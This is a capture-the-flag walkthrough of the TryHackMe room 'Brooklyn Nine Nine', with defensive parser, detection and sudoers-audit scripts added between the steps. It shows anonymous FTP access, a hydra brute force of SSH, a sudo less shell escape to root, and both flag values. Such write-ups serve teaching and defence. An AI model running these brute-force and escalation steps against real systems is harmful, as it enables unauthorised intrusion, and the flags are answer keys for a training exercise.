[TryHackMe] Brooklyn Nine Nine

Today we are going to hack the TryHackMe machine called Brooklyn Nine Nine. You can download it from the following link: https://tryhackme.com/room/brooklynninenine

Enumeration

We start with an nmap scan to see which ports are open.

    ~ > nmap -A 10.10.60.217
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
    Nmap scan report for 10.10.60.217
    Host is up (0.057s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:10.9.24.208
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 3
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
    |   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
    |_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

Nmap shows that we can connect to the FTP server as the anonymous user. We connect to it to see whether there is anything interesting.

    ~ > ftp 10.10.60.217
    Connected to 10.10.60.217.
    220 (vsFTPd 3.0.3)
    Name (10.10.60.217:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
    226 Directory send OK.

We see the file note_to_jake.txt, so we download it.

    ftp> get note_to_jake.txt
    local: note_to_jake.txt remote: note_to_jake.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
    226 Transfer complete.
    119 bytes received in 0.11 secs (1.0441 kB/s)
    ftp> exit
    221 Goodbye.

We look at the contents of the file.

    ~ > cat note_to_jake.txt
    From Amy,

    Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
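The scan output above is the raw material for the rest of the walkthrough, and on the defending side it is also exactly what an exposure review starts from. The following parser is an added example, not code from the original post or from TryHackMe: it reads nmap's normal output format (the port lines and the `|`-prefixed NSE script lines under each port), attaches each script result to its port, and answers the question the walkthrough answers by hand, namely whether anonymous FTP is enabled. The embedded scan text is the page's own output trimmed to the relevant lines; the function names are my own.

```python
import re

# Nmap normal output copied from the scan shown above (the page's own output),
# trimmed to the lines the parser cares about.
SCAN_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
Nmap scan report for 10.10.60.217
Host is up (0.057s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "21/tcp open  ftp     vsftpd 3.0.3" -> port, proto, state, service, version
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# "| ftp-anon: Anonymous FTP login allowed ..." -> script name and its first line.
# Continuation lines such as "|   2048 16:7f:..." carry no "name:" prefix and are skipped.
SCRIPT_RE = re.compile(r"^\|[_ ]\s*(?P<name>[\w-]+):\s?(?P<text>.*)$")


def parse_nmap_normal(text):
    """Parse nmap normal output into one dict per port line.

    NSE script results (lines starting with '|') are attached to the
    preceding port under 'scripts', keyed by script name.
    """
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": m.group("version").strip(),
                "scripts": {},
            }
            ports.append(current)
            continue
        s = SCRIPT_RE.match(line)
        if s and current is not None:
            current["scripts"][s.group("name")] = s.group("text")
    return ports


def anonymous_ftp_allowed(ports):
    """True when any open ftp port carries an ftp-anon result reporting 'allowed'."""
    return any(
        p["state"] == "open"
        and p["service"] == "ftp"
        and "allowed" in p["scripts"].get("ftp-anon", "")
        for p in ports
    )


def open_services(ports):
    """Compact 'port/proto service version' lines for a review ticket."""
    return [
        f"{p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip()
        for p in ports
        if p["state"] == "open"
    ]


if __name__ == "__main__":
    parsed = parse_nmap_normal(SCAN_OUTPUT)
    for entry in open_services(parsed):
        print(entry)
    print("anonymous FTP allowed:", anonymous_ftp_allowed(parsed))
```

On the defending side, the `ftp-anon` result is the finding to act on: in vsftpd the server-side switch is `anonymous_enable=NO` in `vsftpd.conf`, and a file left in the anonymous root (the note here) is readable by anyone who can reach port 21.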
We can see that Amy tells Jake to change his password because it is weak. With this information, we use hydra to brute-force jake's password over SSH.

    ~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 08:14:35
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking ssh://10.10.60.217:22/
    [22][ssh] host: 10.10.60.217   login: jake   password: 987654321

We got the password! We use jake's credentials to connect over SSH...
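A hydra run like the one above is loud on the target: sshd writes one `Failed password` line per attempt to the auth log, followed by an `Accepted password` line from the same source once the guess lands. The script below is an added example (not part of the original post) of the detection a defender would run over that log: it flags any source IP that accumulates a threshold of failures inside a sliding time window and marks whether a successful login from that IP followed, which is the signature of a guessed credential rather than a mistyped one. The log lines are constructed for the example and only borrow the hostname from the session above; function names and the default threshold are my own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (not taken from the machine);
# the burst from 10.9.24.208 mimics what the hydra run above would leave behind.
SAMPLE_AUTH_LOG = """\
Aug  8 08:14:35 brookly_nine_nine sshd[1201]: Failed password for jake from 10.9.24.208 port 50214 ssh2
Aug  8 08:14:35 brookly_nine_nine sshd[1203]: Failed password for jake from 10.9.24.208 port 50216 ssh2
Aug  8 08:14:36 brookly_nine_nine sshd[1205]: Failed password for jake from 10.9.24.208 port 50218 ssh2
Aug  8 08:14:36 brookly_nine_nine sshd[1207]: Failed password for invalid user admin from 10.9.24.208 port 50220 ssh2
Aug  8 08:14:37 brookly_nine_nine sshd[1209]: Failed password for jake from 10.9.24.208 port 50222 ssh2
Aug  8 08:14:38 brookly_nine_nine sshd[1211]: Failed password for jake from 10.9.24.208 port 50224 ssh2
Aug  8 08:14:41 brookly_nine_nine sshd[1213]: Accepted password for jake from 10.9.24.208 port 50230 ssh2
Aug  8 09:30:02 brookly_nine_nine sshd[1402]: Failed password for amy from 192.0.2.77 port 40001 ssh2
Aug  8 09:30:50 brookly_nine_nine sshd[1404]: Accepted password for amy from 192.0.2.77 port 40002 ssh2
"""

# sshd password-auth lines; "invalid user" appears when the username does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_line(line):
    """Return (timestamp, result, user, ip) for an sshd password line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; only differences between them are used here
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return ts, m.group("result"), m.group("user"), m.group("ip")


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Returns a dict ip -> {"failures", "users", "reached_at", "success_after"}.
    success_after is True when the same IP logs in successfully at or after
    the moment the threshold was crossed.
    """
    events = defaultdict(list)
    for line in lines:
        parsed = parse_auth_line(line)
        if parsed:
            ts, result, user, ip = parsed
            events[ip].append((ts, result, user))

    alerts = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        window = deque()          # timestamps of failures inside the current window
        users = set()
        total_failures = 0
        reached_at = None
        success_after = False
        for ts, result, user in evs:
            if result == "Failed":
                total_failures += 1
                users.add(user)
                window.append(ts)
                while (ts - window[0]).total_seconds() > window_seconds:
                    window.popleft()
                if reached_at is None and len(window) >= threshold:
                    reached_at = ts
            elif result == "Accepted" and reached_at is not None and ts >= reached_at:
                success_after = True
        if reached_at is not None:
            alerts[ip] = {
                "failures": total_failures,
                "users": sorted(users),
                "reached_at": reached_at,
                "success_after": success_after,
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, info)
```

Two of hydra's own warnings point at the mitigations: the server limited parallel sessions (`MaxStartups` in sshd), and the whole run would have been pointless with key-only authentication (`PasswordAuthentication no`) or a lockout tool such as fail2ban reading exactly these lines.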
Low Shell

We log in as jake.

    ~ > ssh jake@10.10.60.217
    jake@10.10.60.217's password:
    Last login: Tue May 26 08:56:58 2020

user.txt

We explore the system looking for the user flag.

    jake@brookly_nine_nine:/home$ cd /home
    jake@brookly_nine_nine:/home$ ls
    amy  holt  jake
    jake@brookly_nine_nine:/home$ cd holt
    jake@brookly_nine_nine:/home/holt$ ls -la
    total 48
    drwxr-xr-x 6 holt holt 4096 May 26 09:01 .
    drwxr-xr-x 5 root root 4096 May 18 10:21 ..
    -rw------- 1 holt holt   18 May 26 09:01 .bash_history
    -rw-r--r-- 1 holt holt  220 May 17 21:42 .bash_logout
    -rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc
    drwx------ 2 holt holt 4096 May 18 10:24 .cache
    drwx------ 3 holt holt 4096 May 18 10:24 .gnupg
    drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local
    -rw-r--r-- 1 holt holt  807 May 17 21:42 .profile
    drwx------ 2 holt holt 4096 May 18 14:45 .ssh
    -rw------- 1 root root  110 May 18 17:12 nano.save
    -rw-rw-r-- 1 holt holt   33 May 17 21:49 user.txt
    jake@brookly_nine_nine:/home/holt$ cat user.txt
    ee11cbb19052e40b07aac0ca060c23ee

We check whether we can do anything with sudo.

    jake@brookly_nine_nine:~$ sudo -l
    Matching Defaults entries for jake on brookly_nine_nine:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User jake may run the following commands on brookly_nine_nine:
        (ALL) NOPASSWD: /usr/bin/less
Privilege Escalation

We see that we can run less with sudo, which can let us obtain a privileged shell. To do so we run:

    jake@brookly_nine_nine:~$ sudo /usr/bin/less /etc/shadow

Once the file is being displayed, we type:

    !/bin/bash

And we now have a root shell:

    root@brookly_nine_nine:~# id
    uid=0(root) gid=0(root) groups=0(root)
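The rule `(ALL) NOPASSWD: /usr/bin/less` is the whole privilege escalation, so the defender's counterpart is a sudoers review that catches rules shaped like it before an attacker does. The script below is an added example, not code from the original post: it parses the `sudo -l` output shown above into rules (run-as user, tags, command) and flags each rule that is usable without a password or that lacks sudo's `NOEXEC` tag, which stops a dynamically linked program such as less from executing child processes and therefore defeats the `!/bin/bash` escape used here. The embedded `sudo -l` text is the page's own output; the function names and the "hardened" rule in the test are my own.

```python
import re

# Output of `sudo -l` for jake as shown above (the page's own output).
SUDO_L_OUTPUT = """\
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
"""

# "(ALL) NOPASSWD: /usr/bin/less" -> runas, zero or more TAG: prefixes, command
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<command>.+?)\s*$"
)


def parse_sudo_l(text):
    """Return the user-specification rules listed by `sudo -l` as dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Rules follow the "User X may run the following commands on HOST:" header;
        # everything before it is the Defaults block and is ignored.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
            rules.append(
                {"runas": m.group("runas").strip(), "tags": tags, "command": m.group("command")}
            )
    return rules


def audit_rules(rules):
    """Flag rules that hand out elevated commands without the usual guard rails.

    - NOPASSWD: anyone holding the user's session can use the rule, so a
      guessed password (the hydra step above) is all it takes.
    - no NOEXEC: the program may spawn children, so a pager or editor with a
      shell escape hands over a shell instead of a file view.
    - ALL as the command is unrestricted root by definition.
    """
    findings = []
    for r in rules:
        reasons = []
        if "NOPASSWD" in r["tags"]:
            reasons.append("NOPASSWD")
        if r["command"] == "ALL":
            reasons.append("unrestricted command")
        elif "NOEXEC" not in r["tags"]:
            reasons.append("no NOEXEC")
        if reasons:
            findings.append({"runas": r["runas"], "command": r["command"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{f['command']} (as {f['runas']}): {', '.join(f['reasons'])}")
```

In `/etc/sudoers` the corrected rule for this case would read `jake ALL=(root) NOEXEC: /usr/bin/less`, which both asks for the password again and blocks the pager from starting a shell; note that `NOEXEC` relies on library preloading, so it only constrains dynamically linked programs, and the better fix is to not grant a pager or editor via sudo at all.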
root.txt

    root@brookly_nine_nine:/root# cat /root/root.txt
    -- Creator : Fsociety2006 --

    Congratulations in rooting
    Brooklyn Nine Nine
    Here is the flag: 63a9f0ea7bb98050796b649e85481845

    Enjoy!!
    root@brookly_nine_nine:/root#

End

With that, we have finished the machine :)